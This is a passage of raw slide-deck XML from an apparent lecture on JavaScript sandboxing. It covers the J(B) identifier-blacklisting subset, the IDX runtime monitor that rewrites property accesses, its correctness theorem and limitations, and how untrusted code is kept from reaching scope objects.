                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=42;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Property names can be created dynamically: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>[e].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic constructs like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> compromise enforcement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution should allow multiple FBJS applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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29</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39875" y="657225"/>
            <a:ext cx="6064250" cy="5543550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="640087"/>
            <a:ext cx="6096000" cy="5608313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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z="3800"/>
              <a:t>J(B): a subset to enforce blacklisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Let B be a list of identifiers (variables or property names) not to be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> be the set of all JavaScript identifiers that can be accessed implicitly, according to the semantics. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Some implicit accesses involve reading (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>), others involve writing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Solution: we can enforce B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(disjoint from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) by filtering and rewriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Disallowing all terms containing an identifier from B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in B by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Rewriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[e2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[IDX(e2)]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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30</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The run time monitor IDX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We need some auxiliary variables: we prefix them with $ and include them in B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> $String=String; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> $B={p1:true;...,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pn:true,eval:true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>,…,$:true,…}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Rewrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[e2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[IDX(e2)]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, where </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		IDX(e) = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		($=e,{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>toString:function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>					return($=$String($),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>					$B[$]?"bad":$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>					}})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Blacklisting can be turned into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> by inverting the check above (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$B[$]?$:"bad"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Our rewriting faithfully emulates the semantics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		e1[e2] -&gt; va1[e2] -&gt; va1[va2] -&gt; l[va2] -&gt; l[m]	</a:t>
            </a:r>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31</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Evaluation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Theorem: J(B) is a subset of ECMA 3 that prevents access to the identifiers in B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Works also for current browser implementations (by extending B with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>_proto_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc. where necessary).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the code does not access a blacklisted property, our enforcement is faithful to the intended semantics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Two main limitations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Variables are blacklisted together with property names. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> is a blacklisted variable, we must blacklist also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>obj.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Heavy to separate namespaces of multiple applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Default blacklisting of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Restrictive for general JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Reasonable for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>certain classes of applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"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32</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Preventing scope manipulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>We want to prevent explicit access to scope objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>	 this.x=1; var o={y:41}; with (o){x+y} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Two cases: the global scope, and local scopes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>The global scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Evaluate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> in the global environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Evaluate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(function(){return this})()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Call native functions with same semantics as above. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Local scope objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> construct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Try-catch. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Named recursive functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
